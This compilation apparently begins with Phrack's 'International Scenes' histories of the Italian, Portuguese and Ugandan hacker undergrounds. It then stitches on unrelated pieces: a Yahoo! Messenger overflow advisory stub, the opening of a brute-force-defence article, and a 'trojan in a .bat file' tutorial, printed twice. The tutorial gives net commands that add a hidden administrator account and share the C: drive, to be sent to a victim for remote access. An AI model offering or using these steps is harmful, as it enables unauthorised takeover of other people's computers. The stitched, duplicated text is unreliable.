--------------------------------------------------------------------------
An overview of the italian underground (1994-2007)
You did read about the Italian scene last time on Phrack #47 [0], just
a few months after the Italian Crackdown in 1994. This short article is
an attempt to sum up the evolution of the Italian underground since
those days.
1994 was the year of the so called Italian Crackdown (aka FidoBust): a
wide (and wild) Finance Guard operation nominally aimed at busting
warez BBS. A stunning total of nearly 200 BBS systems on the FidoNet
network were seized with irresponsible methods including, but not
limited to, the requisition of all electronic equipment from the sysops
(included modems, cables, keyboards, monitors, ...) as well as the
police sealing whole rooms.
In its first phase the purpose of the operation was to fight the illegal
market of copied software and to satisfy the BSA lobby this way. However
subsequent seizures and raids proved the crackdown also had a political
objective. The bust included BBS that belonged to CyberNet (a network
supporting the motto "INFORMATION WANTS TO BE FREE", populated by
hackers and cyberpunks alike, close to social centres), ECN [1]
(european network dedicated to broadening political debate and providing
counter-information about social themes and workplace politics) and
PeaceLink [2] (peace/ecologist association and network).
Though just a few BBS were really involved in sale of warez, a lot of
completely legal BBS closed to never open again as a result of the bust.
As new people were being busted, the national press gave its best at
building castles in the air about hackers and describing them as
software pirates or members of organized crime. The underground reacted
striking to the reliability of media with a round of actions signed by
the multiple name Luther Blisset [3]. The campaign adopted hoaxes and
communication guerrilla to show the unsuitability of journalists, and
even managed to have Mondadori, the second most important publishing
company in Italy, print the whole *fake* book "Netgeneration" (1996).
As a consequence of the crackdown the Italian underground started
feeling the need of an organization similar to the american EFF, able to
support hackers against abuses. In 1995 ALCEI Electronic Frontiers
Italy [4] was founded to "affirm and protect constitutional rights for
electronic citizens as new communications technologies emerge".
Nearly at the same time, Metro Olografix [5] was born, an association
made by people with a mixed range of skills and histories, from
cyberpunks and hackers to social volunteers, that nowadays counts about
80 members. The main mission of Metro Olografix is to spread the
telematics culture through the country supporting the old BBS spirit of
sharing, free communication and cooperation. Metro Olografix has an
office in Pescara for real life meetings and acts as a crossroads for
other groups and individuals to meet. Thanks to the esteem and trust
gained from the most part of the Italian underground, the association
was able to organize events like "L'hacker e il magistrato" ("The
hacker and the magistrate", from 1995 to 1999), a face to face
conference involving hackers, magistrates and press reporters, aimed at
communicating and making understand the difference between hackers that
follow hacker ethic and real criminals.
While BBS were still experiencing hard times, 1995 registered the
boom of Internet access in Italy - mainly thanks to the VOL ISP that
offered free promotional accounts, opened POPs in many cities reachable
with a cheap urban rate call and at the beginning even provided a
toll-free number. Internet access was no more limited to universities
and the opportunity to have a relatively fast, cheap and long lasting
Internet SLIP (later on PPP) connection from home marked the growth of a
new generation of young hackers. Those guys started to study and play
with TCP/IP protocols and they elected the Linux open-source operating
system and the C programming language as their favourite study matters.
Those wannabes were going to inject into the Italian underground new
ideas within a few years and to create some valuable projects and
groups.
Like the new generation, old-school BBS hackers too got very
interested in the communication opportunities offered by the Internet.
Thanks to "Isole nella Rete" [6] (the Italian for "Islands in the Net"),
the Internet connection of ECN, BBSs of the CyberNet circuit begun to
put their contents online. Message areas turned into mailing lists and
IRC channels like #cybernet were born on EFNet.
=46rom 1987 to 1998 *the* fanzine of the Italian underground was Decoder
(published by ShaKe Edizioni Underground, a cyberpunk cooperative based
in Milan): covered subjects included hacking, hacktivism, networks,
cyberpunk culture, counter-information, leading figures and events from
the international scene, virtual reality and new technologies. As
Decoder was the only printed underground zine during those years, a few
hacking/phreaking e-zines were released: The DTE222 Technical Journal
(1987) and The Black Page (1994): altough those experiences did not
last as long as Decoder and did not focus on international scene, their
technical level was considerable.
In 1996 the first number of System Down was published, an e-zine
written by some users of IRCNet channels #cybernet and #hackers.it.
Quality and technical level of articles marked a drop compared to
previous zines, because authors were largely young guys that had started
hacking just after the Internet boom, they were not very conscious about
hacker culture and the past works of the Italian underground.
Year 1997 saw a flourishing of new groups that lived hacking mostly as
study and research about programming, networks, operating systems,
instead of catching its political value and focusing on its
consequences for the society. In the beginning members of those
organizations were for the most part low skilled, but many of them were
higly motivated, tenacious, capable of learning quickly and they
reached a very good technical level in a very few years.
Orda delle Badlands was a crew especially dedicated to owning systems on
Internet and to ircwar (deprecable activity, but widely exercised over
those times). The experience exhausted in few years because the engine
of the group was in fact the cooperation within actions engaged by its
charismatic leader (that was nearly worshipped); in the long run that
proved to be an insufficient incentive, the crew closed and some of its
members joined other groups.
Antifork [7] (formerly known as disLESSici) more than a crew is a
'hackers research virtual lab', a place where hackers can share their
techniques and codes following open source and full disclosure
philosophies. Between Antifork members there are also creators of well
known tools like ettercap. Antifork software is available through their
website and public access CVS.
The S0ftpj [8] group reunited people with different skills and
backgrounds: cyberpunks, sysops, coders, virus writers, security and
privacy researchers, hardware and network experts. Since the beginning
the group stood out out by its will to collaborate and confront
with other realities of the Italian underground (this explains the
notable amount of its releases distributed via its website). S0ftpj team
skills cover a wide range of fields - it has been contributing
to many events in the country holding workshops mainly focused on
its research in kernel hacking and new privacy enhancement technologies.
In the meanwhile, as these new groups were appearing, the fusion between
ECN/CyberNet hackers and the squat scene brought in 1998 to the first
Hackmeeting [9], a yearly 3-days hacker con "without *organisers,
teachers, public and customers* but with *sharers*", held in a T.A.Z
[10] and then totally self-organized. Altough the level of its speeches
is not always very high, Hackmeeting has become a unique opportunity to
have fun and discuss with people from different realities and feel the
informal atmosphere of old times - free of commercial influences. In
1999 the second Hackmeeting promoted the idea of "hacklabs",
laboratories mainly hosted by social centres where hackers could meet
in real to share and develop their do-it-yourself attitute and their
knowledge about programming, technologies, media activism, privacy and
cyber-rights. After Freaknet Medialab [11], the first Italian hacklab
and home of radio#cybernet, opened in Catania in 1995, other hacklabs
popped out in biggest cities of the country (Florence, Milan, Bologna,
Turin, Rome).
In spring 1998, when System Down stopped publication, S0ftpj and Orda
delle Badlands started a new e-zine called Butchered From Inside (BFi)
[12] that dealt with various topics (h/p, virus, reversing, reports from
cons, underground culture, ethics) following a semi-disclosure policy
(no complete and ready to use exploits and tools, but techniques). At
first the technical level of articles was low, but it quickly improved
and from its second year of life it already distinguished itself by its
originality and quality of its articles. BFi documented the growth of
new characters in the Italian scene, in the course of time it adopted an
acceptance policy for articles similar to the one used by Phrack and
today is also read by non-Italian people thanks to its English, French
and Spanish translations. BFi is written by hackers that belong to many
organizations, indipendent researchers and, obviously, by S0ftpj
members who have been editing and contributing during these years.
BFi has provided an example of the good spirit and built a virtuous
circle where new ideas and techniques, at first explained in the
articles, inspired other hackers to develop them further and publish
them in later articles. The feeling of a steady continuity between
works made by different contributors was great, so BFi launched
successful collaborations between hackers. In autumn 2001, BFi hosted
an important debate about a subject that had been in the background for
long time, but that had not been discussed publicly yet: feasibility of
hacking without political connotations. That topic of course was not
exhausted in that circumstance and was going to resurface periodically:
that discussion anyway helped all parties to think about it and
confront with each other: "politicals" understood that a big effort in
experimenting new techniques was becoming foundamental to fight their
battles efficiently, while "technicals" acquired a stronger
consciousness of their actions.
Sikurezza.org [13] has been another good project aimed to develop
discussions about computer security. It was established in 1999 with a
few open mailing lists, where advanced topics could be talked over by
hackers in a vendor-free, no-profit and full-disclosure atmosphere.
Unluckily, in parallel with the dramatic increase in subscribers and
posters, the technical level of posts progressively and necessarily has
decreased through the years, altough the list still represents an
important community credited also by the underground. Moreover,
researchers presenting themselves under Sikurezza.org umbrella dictated
a new style and quality standard in security speeches for events held
in Italy.
Other active hacking groups in those years were Spippolatori, Packet
Knights Crew and S.P.I.N.E.: some of them released interesting stuff
but they all eventually closed by 2005. There were also many attempts
to start new e-zines. Apart from OndaQuadra that contained also a few
nice articles, quality was low and every new e-zine started talking
about hacking from a very basic level instead of learning and catching
inputs sent from other previous editorial experiences.
New school Italian phreakers mostly have been interested in studying
PSTN/ISDN, phone kiosks and magnetic cards, cellular cloning and VoIP.
BFi published various articles on Fastweb, the biggest national fiber
optic ISP. Fastweb Milan metropolitan network has been the favourite
playground for pioneering VoIP and IPTV hacking. Since 1998 the
Spaghetti Phreakers [14] website and mailing list have been an archive
and meeting point to experiment and learn and contributed in keeping
alive interest about phreaking among new generations.
The Italian underground counts talented reverse engineers and software
crackers; some of them have been members of renowned international
cracking groups or the cracking university +HCU. Web sites like
Universita' Italiana Cracking[15] (resembling the teaching style of
+HCU) and 3564020356 [16] have been running for many years and provide
nice communities and huge archives of tutorials and technical documents.
RingZ3r0 and RACL were other two groups that published good textfiles
about reversing but they are no more active.
Italy is a country with a long and prolific artistic tradition and the
underground has got its own artists too. There have been many good demo
groups (for a comprehensive list, check the site Scene-IT [17]) and
some demo parties: "The Italian Gathering" organized by Metro
Olografix from 1996 to 1998 in Pescara, a demoscene area within
Codex Alpe Adria [18] (a wider event also featuring retrocomputing,
emulation and alternative systems) from 2004 to 2006 in Udine and since
2007 the HORDE [19] demoparty. Prof. Bad Trip [20] has been a peculiar
experimental artist capable of interpreting cyberpunk offering a visual
perspective on themes like cyborgs, mutants, polluted metropolis from
a disturbed future and so on. It is worth mentioning, in the end, the
graphic novel "Uccidere un Hacker" [21] (the Italian for "Killing an
Hacker") by Andrea Ferraresso inspired by the story of the German
hacker Karl Koch.
In the field of privacy, a milestone was erected in 1998 with the book
Kriptonite [22] written by hackers from ECN/CyberNet. Kriptonite
extensively covered theory and practice of topics like cryptography,
anonymous remailers, nym servers, steganography, voice encryption and
packet radio.
Somehow influenced by Kriptonite, Progetto Winston Smith (PWS) [23] has
been working since 1999 to sensibilize netcitizens about the risks of
technocontrol and network surveillance. PWS mantains a website
providing information about privacy enhancement technologies, for both
administrators and end users. Moreover PWS organizes every spring in
Florence a free convention called E-Privacy [24]. The con develops in
two tracks where privacy related topics are discussed at a legal and
technical level; it also hosts the local cerimony of Big Brother Awards
for the yearly best privacy violators in Italy. Besides E-Privacy there
were other events about privacy and freedom organized by Metro Olografix
like the Metro Olografix Crypto Meeting and Cyber Freedom.
Autistici/Inventati (A/I) [25] was born in 2001 as a collective of
people from hacklabs and media activist and its main effort has been to
build a server that offers free services like web/blog/mail hosting,
anonymizer, anonymous remailer and mailing list management for activits
and people desirous of privacy. The A/I server, due its policy voted to
free speech, had to be defended in tribunal many times. In summer 2005,
A/I discovered that its server had been phisically compromised, and
that the Italian police had had access to its SSL keys (which allowed
them to monitor all the traffic for a whole year). The collective
reorganized and deployed the so called "R* Plan": a fresh decentralized
redundant network infrastructure with servers located in different
countries and jurisdictions. As well as for any provided service, A/I
made technical documentation for Plan R* [26] avaible on its site.
Thanks to the work by PWS, A/I and individuals, Italy boasts various
TOR and Freenet nodes as well as anonymous remailers and nym servers.
Analyzing this short story so far you, the reader, could argue that the
underground in Italy is very healthy, but unfortunately the expression
"zombie-scene" used by Duvel in last Phrack issue [27] fits well its
real current status.
An alarming matter of fact is the big number of people once in the
underground that now collaborate with computer crime units or work for
companies providing malware and services to law enforcement agencies.
These people have been largely contributing to the death of the the
underground in Italy: even when they did not consciously fight other
hackers, the lack of trust and paranoia acted as disgregating forces
against groups and cooperations. The underground has shown not only it
is not strong enough to refuse working for law enforcements, but it is
not even able to isolate people that publicly claim to partecipate and
belong to the underground while at the same time working for the police.
Wounds are made to the underground not only by the ones who explicitly
want to strike it, but also from entities willing to exploit it. The
Hacker Profiling Project (HPP) applies criminal profiling methodology to
enable analysts to identify the kind of attacker and to anticipate his
next moves. It tries to accomplish its goal by collecting
questionnaires from hackers and deploying honeynets. Altough HPP
creators, that are italians, promote their work between hackers
stating they want to break stereotypes about the hacker figure, this
sounds a bit bizarre... their real goals are quite evident to
everybody. Zone-H [28] is another attempt to suck from the underground
giving back shit to it. The archive of defaced websites lacks the good
spirit of the old Attrition.org and the primary purpose of the
portal activities is to keep high the perception of an evil hacker
menace to sell more ethical hacking courses and services. The
organization has been able to attract a few young guys and exploit them
in borderline actions (the founder has been arrested in connection to
the Telecom Italia spying scandal [29]). It seems that in italy the
more people use the word "ethical" the less they prove to really have
an ethic.
Like everywhere, nowadays many Italian hackers are in the security
business and have stopped releasing their advances and works through
underground channels. The problem is not the fact that they speak at
commercial cons, but the limited amount (and sometimes lack of free
access) of knowledge they usually provide in such events. Those people
largely made their bones inside the underground communities and they
learnt a lot from underground publications and releases. It is then
auspicable that hackers working in security field would keep showing
their slides at cons but also give back to the underground what it
deserves, that is a detailed view of their researches to let other
hackers study, learn from and improve (or thwart, this is part of the
game, sorry) them.
In this discouraging scenario the hackmeeting community has been always
managing to wake up a few mounths before the yearly meeting and make it
a nice event, but it has experienced difficulties in bulding a
continuity of activities during the rest of the year between
consecutive meetings. Number of hacklabs in the country also decreased
in last years. In 2004 Metro Olografix organized MOCA, a hacker summer
camp run in Pescara that resembled the CCC camp and was a great
success. The experience it is likely to be repeated in summer 2008. In
recent times Net&System Security has stood out among technical cons
because of medium-high quality of its speeches; the con is held every
year in Pisa. Old groups appear dormient and only a few public releases
are published. Also BFi magazine has progressively decreased its number
of articles per year until 2006, but last year marked an inversion of
this trend that made room for a hope in a renewal of activity in a near
future. A few new groups have released good stuff but their names are
not cited here because they are not underground-only oriented - they
also offer business solutions.
Italian underground is still active, but most of old hackers keep a
low profile and rarely make their works publicly available. Most groups
and e-zine sites has been put offline by their staff depriving new
generations from accessing a part of the underground history and
culture. The underground should exploit new web technogies to regain
its past visibility and influence (do "media saturation" and "cDc"
remind you of anything?) on young talents to offer an alternative
perspective than the one proposed by the world of commercial security.
Hackers now employed in the ICT industry should understand the risks of
underground death and make an effort to spread knowledge coming from
their research through underground vectors and methods and taking back
advantages offered by a review and comparison with the community.
Limits imposed by new laws and extended technocontrol would hopefully
act as a strong incentive for the underground to get more united and
reactive.
Hackers role is to make the future more *free*, not (only) more (IT)
secure. Join the underground, keep working for and with the underground
if you care about your freedom, in Italy and everywhere.
[0] International Scenes
Phrack Magazine Volume Six, Issue Forty-Seven, File 21 of 22
http://www.phrack.org/issues.html?issue=3D47&id=3D21
[1] E.C.N. European Counter Network
http://www.xs4all.nl/~tank/ecn/
[2] PeaceLink
http://www.peacelink.it/
[3] Luther Blisset
http://www.lutherblissett.net/
[4] ALCEI Electronic Frontiers Italy
http://www.alcei.it/
[5] Metro Olografix
http://www.olografix.org/
[6] Isole nella Rete
http://www.ecn.org/
[7] Antifork
http://www.antifork.org/
[8] S0ftpj
http://www.s0ftpj.org/
[9] Hackmeeting
http://www.hackmeeting.org/
[10] Temporary Autonomous Zone
http://en.wikipedia.org/wiki/Temporary_Autonomous_Zone
[11] Freaknet Medialab
http://www.freaknet.org/
[12] Butchered From Inside
http://bfi.s0ftpj.org/
[13] Sikurezza.org
http://www.sikurezza.org/
[14] Spaghetti Phreakers
http://www.spaghettiphreakers.tk/
[15] Universita' Italiana Cracking (UIC)
http://www.quequero.org/
[16] 3564020356
http://3564020356.org/
[17] Scene-IT [!]
http://scene-it.untergrund.net/
[18] Codex Alpe Adria
http://www.0xaa.org/
[19] HORDE
http://horde.untergrund.net/
[20] Prof. Bad Trip
http://www.profbadtrip.org/
[21] Uccidere un Hacker
http://digilander.libero.it/code6502/
[22] Kriptonite
http://isole.ecn.org/kriptonite/
[23] Progetto Winston Smith
http://www.winstonsmith.info/
[24] E-Privacy
http://e-privacy.winstonsmith.info/
[25] Autistici/Inventati
http://www.autistici.org/
[26] Plan R* Orange Book
http://dev.autistici.org/orangebook/
[27] A brief History of the Underground scene
Phrack Magazine Volume 0x0c, Issue 0x40, Phile #0x04 of 0x11
http://www.phrack.org/issues.html?issue=3D64&id=3D4
[28] Zone-H
http://www.encyclopediadramatica.com/Zone-H
[29] Telecom-SISMI Scandal
http://en.wikipedia.org/wiki/SISMI-Telecom_scandal
---------------------------------------------------------------------
The Portuguese Scene
----------------------
(By Eurinomo and Quickzero)
- The evolution of the Internet
When Internet showed up, it was very expensive, even around 96/97 we
had to pay something like 1.50Euros per hour to the ISP, plus, around
1 Euro per hour to the Phone company for a Dial-up connection.
Some years later, internet got cheaper, in fact, free! ISPs started racing
on giving away free dial-up accounts without any limitation of time, they
even gave CDs with already created accounts. Still, we had to pay
the phone company.
Around 2000/2001, ADSL and cable connections started showing up, it was
kind of cheap, around 35Euros per month for a 512k connection, plus the
15Euros per month for the phone line or cable. There were no time
limitations, only traffic limitation around 3GiB. A lot of people started
showing online, for most of them Internet was a new world. Some people
started creating domestic servers, sharing information, code, and
software.
Years later, 24mbps connections were made public using ADSL2+, and it just
cost around 35Euros per month on total, with 60GiB traffic limit, so
people started to take this advantage to trade games and movies.
On the present date, OC connections are available to the public on the
capital (Lisbon), an OC connection, up to 60Mbps, costs something around
50Euros per month.
On resume, we had a slow start on internet service, but now he have a kind
of quick evolution.
- The evolution of technology
Technology always has been expensive, even now, electronic parts are very
expensive, but computers, are getting cheaper and cheaper.
I remember when I bought my first x86, it was a used Pentium-90, 16MiB of
ram, 1GiB of HD, this all inside a heavy Big-Tower, it cost something
around 700Euros, remembering that it was a used computer, and the cheapest
price I could find, the best computer around that time was a Pentium-133.
A new computer (Pentium-133) cost something around 2000Euros.
Around 2000/2001, computers started to get cheaper, more people started to
buy computers (at that time, not many people had one).
On the present date, anyone can buy a good complete computer (or laptop)
with less than 400Euros.
Only recently with this cheap technology, government and other high
entities documentation and information meet the digital world, most of it
is/was stored in hand made paper work.
- The evolution of society
Portuguese people may have an extreme reputation on sailing and
discovering
'new worlds', but it seemed that all this ended up a few centuries ago.
Nowadays, society is a lot stupid and ignorant, they started to loss the
pride of being Portuguese, the pride of the world not being enough for
everyone and still having half of it on they're hands, the courage to make
discoveries, and ending up on people that are happy if they have food on
the table, and a good reality show or soap opera on TV.
Society gives more value to someone that does something using the tools of
other person, that the person that made those tools. Per example, they
consider an expert, someone that unlocks mobile phones without knowing
what he is actually doing, without knowing what is behind it. They give
more importance to someone wearing a tie, than someone dressed normal,
they also give more importance to someone that doesn't know what he is
talking about but has a PhD or something, that someone that knows a lot
about what he is talking about, but doesn't have any diploma.
The term 'hacker', is not very popular in society, the last time it
appeared on TV was two years ago, in the format of a interview with
someone calling himself 'buzzybee', he was only a script kiddie that did
some defacing and carding, was self proclaiming himself a 'hacker' and
showed up on the news, saying that he was able to do get free stuff using
carding, and had access to any site of the internet and so on, everyone
that was in the scene knew this kid real name, phone, address and age,
even thought he hadn't many problems with the police.
- The evolution of the scene
Finally the part of most interest, the Portuguese scene is kind of
obscure, almost no one outside the scene knows what in fact is going on.
No one knows when the scene really started since it started before
the boost of telecommunications, a guess goes around 70s and 80s.
In the 90s, some groups started to show up, groups like Kaotik, Pulhas,
Ironik and a few others, even an e-zine came up, called 'PT Zine',
but died on the third release. Some of the groups still exist to this
day, but not much information comes out of it. Also, some individual
people started to show up in the form of Hackers, Crackers and
Phreakers.
The most notorious groups were:
Pulhas: Founded in 1994 by Kennobi. This was the oldest Portuguese group.
Actually is 'dead', but they had their golden age in the 90's by the
inumerous papers that they wrote and the exploit/code database to the
Portuguese mainstream.
Toxyn: Founded in 1996 by m0xx. This group is notorious known by their
campaign against Indonesia, when East Timor was occupied by Indonesia
millitary. The attack against the IT indonesian infrastracture was
motivated by the currently abuses of Indonesian military officers against
east timor people. Toxyn start their campaign with this statment: "We hope
to call attention to the necessity of self-determination and independence
of the people of Timor, oppressed and violated for decades by the
government of indonesia. We hope you give your full attention to this
historical step towards freedom, we ask that you help us fight the tyranny
of Indonesia occupating Timor." The campaign was started at 10/2/1997.
The fall of the Toxyn, has began when m0xx, has accepted and gave
inumerous interviews about the campaign and about the portuguese hacker
scene, exposing plans and actions of the scene. Toxyn group was helped
by Savage, an known spanish hacker, who developed the exploit, that
Toxyn Group used to break in in the .ID servers.
KaotiK: Founded in 1997(??). They've been a very active group in the
East Timor campaign, hacked and defaced inumerous .id websites. They've
created the first ezine about hacking & security to Portuguese people.
The e-zine was extinct after 3 editions. KaotiK has reach their fame in
the Portuguese Scene after a member disclosure of some flaws in various
Microsoft products.
F0rpaxe: F0rpaxe was maybe, the most mediatic group/'hacker'/troll, for
the worst reason. This character was the responsable for the first major
attack against US .mil targets in 1999. The attacks were allegedly being
carried out in retaliation for Federal Bureau of Investigation (FBI) raids
on suspected "crackers" in several U.S. cities. The attacks hits various
governemental and military webservers including FBI, NSA and the Navy.
East Timor Campaign: Was one of the firsts major hackivism campaign
worldwide. Timor was in Portuguese administration until 1975, after
Portuguese government abandoned that country, Timor was invaded by
Indonesia military army, who oppressed, violated, raped and murdured for
most 20 years. Various Portuguese hackers and groups decided to begin a
campaign to show to the world the truth about the Indonesian occupation
in East Timor. The East Timor campaign started in 1997 and was finished
in 1999. Various military, governement and corporativ indonisian websites
had been defaced. The defaces was to aware all people in the world about
the illegal occupation of East Timor, the mission was accompliced, the
attacks were transmited to the media all over the world. The campaign
was finished when m0xx, the lider of the group Toxyn, gave inumerous
interviews to the midia, exposing then the entire portuguese scene to the
public.
[5~Between 2002 and 2004, two Portuguese hackers also did some 'infamous'
work, these two hackers gained access to FCCN ('Fundacao para a
Computacao Cientifica Nacional' / Foundation for National Scientific
Computation), witch was backdoored with a reverse ICMP backdoor developed
by them, witch rumours say it is still active. They also gained access
to numerous universities and were backdoored the same way, this includes
the 100 machines cluster 'Centopeia' from 'Faculdade de Coimbra'. A lot
more work was made, including the database server of 'A.M. Gonçalves' and
'Salvador Caetano', Portuguese Toyota distributor. Then they just
disapeared from the scene.
Some of the people inside the scene are found on the x86 '0xD9D0', those
whom know, know what I'm talking about.
On the start of the new millennium, an explosion of 'lame' groups started,
most of them were kids playing up with Trojans, others, were script kids
playing up with public exploits, most of this groups are found on a
Portuguese IRC network, called PTNet. Some of these kids turned up to be
carders, using databases found by 'Google hacking', or simply by asking
people on some IRC networks. Some of these kids ended up having problems
with the police, but nothing serious.
Also in the start of the new millennium, satellite and cable Phreakers
starter to show up, breaking encrypted signals, an unnamed box came out,
that was plugged in the TV SCART connection and an external 9v power
supply, and unlocked (in fact, it broke the Nagravision encryption) every
single channel there was on cable TV, this box for a long time was though
to be made outside of Portugal, until I had the pleasure to meet the
original creator of it, and guess what, he was Portuguese, and lived next
to me, he explained me how it really worked, and how was the original
version, since the version that everyone had, that was commercialized
by lame groups searching for profit, had way too much components that it
didn't need at all, it even got some traps, only to make itself more
expensive, and difficult to make, in order to avoid people
commercializing it. Also, satellite FTA boxes started to get themselves
modified nationally, in order to break satellite TV encryptions,
like Nagravision (used by or cable TV provider, 'TVCabo'). So did the
original TVCabo cable boxes, some national hackers were able to hack
the firmware, in order to get its unique ID (Boxkey), and created cards
that once plugged, were able to break the signal. After this, this
knowledge started to get public, but on a 'pratical' way, and lots of
people started to make profit out of it, without knowing what they were
really doing. In other words, they knew if they bought this and that, and
used this and that software, were able to have free satellite/cable TV,
and they could seal later to other people. An example was the first
unnamed box that was created, it cost 4Euros to build, but people were
sealing it up to 100Euros. So do the FTA boxes, cost something around
70Euros unmodified, and were sold for 250Euros modified at no cost.
Nowadays, the scene is still obscure, and people are still ignorant,
sometimes, there is an exception, like when I went to an interview to
a part of the Bosch Group, where the guy interviewing me, by reading my
curriculum started to laugh silently, and said to himself 'A hacker..' and
'hackers do not harm anyone... only if pushed too', without me making any
mention to illegal activities (duh) or being member of this or that group.
When I was guessing myself unemployed, I got myself well employed, and
working on more areas than I was asked to, I even got myself involved
with robotics, automation, and electronics, when I was attending the
interview as web developer for an Intranet. Later, we found out that I
already knew him from the scene, and so did he knew me.
-----------------------------------------------------------------------
Ugandan Scene(surprise!!!!!)
============================
by gmac
Introduction
------------
For those who don't know what Uganda is n are too lazy to use google, well
in short its located on the African continent more specifically in Eastern
africa. Still lost then this will clear it all up for you, have you ever
heard of a movie called Last King of Scotland if yes then you know Uganda
and if No then use google.
Sometime back.....
------------------
Cutting edge computer technology is as you correct in assuming fairly new
in the Ugandan context, it cannot be more than 13 years old so generally
hacking on our scene had maintained a fairly urban legend status, not much
is avaliable on any hacking groups back in the day to be honest to my
knowledge they were almost none existent.
Present....
-----------
Currently as technology advances the scene has surfaced with formation of
groups like gsquad by yours truly which is i believe the first of its kind
here, although hacking has still maintained its urban legend status the
scene is dominated by a few knowledgeable individuals. Bu..t the winds of
change are upon us because i have seen the advent of a new generation with
a desire which ofcourse has been fueled by hacker related movies like most
recently Die Hard 4.0. The gsquad remains the only active group providing
help to individuals on request and ofcourse releasing zines(which was but
made a print debut recently) which has won many fans but ofcourse inspired
by Phrack. This new generation needs content and i think Phrack is our one
stop Hacking Content Provider (HCP,oh i made that up).
We are late comers onto the scene but we will catch up because we have the
spirit, and oh it was BloodAxe's first appeal that drove me to starting
the gsquad so i hope the circle of lost hackers' appeal will inspire
another individual somewhere on this planet.
We maybe in different lands but we are part of the same underground, so we
will survive the media caused division which started all these different
kind of hats i hear white hats....erm...black...grey we may soon hear pink
hats(ie blondes running security sites)
The spirit still lives on but its in a critical state......
Friday, October 17, 2008
International Scenes 2008
-:Making your own trojan in a .bat file:-
Open a dos prompt we will only need a dos prompt , and windows xp...
-Bazics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:
dir
pause
And now save this as test.bat and execute it.
Funny aint it ?
---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access
Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.
Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant
Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.
Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.
-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.
->To see your ip in the dos prompt put this command: ipconfig
-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.
Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!
-Bazics-
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok
Now insert this command: net
And you will get something like this
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:
dir
pause
And now save this as test.bat and execute it.
Funny aint it ?
---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access
Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.
Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant
Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know wich version of windows xp you are going to try share.
Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.
-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.
->To see your ip in the dos prompt put this command: ipconfig
-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.
Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!
Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability
It has been reported that a remote buffer overflow vulnerability affects Yahoo! Messenger. This issue is due to a failure of the application to securely copy user-supplied input into finite process buffers.
It is likely that the attacker must be in the contact list of an unsuspecting user to exploit this issue. It should be noted that the details surrounding this issue are not clear; this BID will be updated as more details are released.
An attacker may leverage this issue to execute arbitrary code in the context of an unsuspecting user running a vulnerable version of the affected application.
exploit
Preventing a Brute Force or Dictionary Attack: How to Keep the Brutes Away from Your Loot
A brute force attack, also known as a dictionary attack, is one of the more uncomplicated attacks available to a hacker. However, the odds of this type of attack succeeding can be very high if a site is not configured properly. Learn more about what can be done to defend a site against a brute force attack - including implementing incremental delays and carefully wording error messages - and which defensive strategies don't work. To understand and then combat a brute force attack, also known as a dictionary attack, we must start by understanding why it might be an appealing tool for a hacker. To a hacker, anything that must be kept under lock and key is probably worth stealing. If your Web site (or a portion of it) requires a user to login and be authenticated, then the odds are good that a hacker has tried to break into it. In terms of processing power, it is expensive for a Web site to require authentication, so it is usually only required when the site stores valuable private information. Corporate intranet sites can contain confidential data such as project plans and customer lists. E-commerce sites often store users' email addresses and credit card numbers. Bypassing or evading authentication in order to steal this data is clearly high on a hacker's priority list, and today's hackers have a large library of authentication evasion techniques at their disposal.
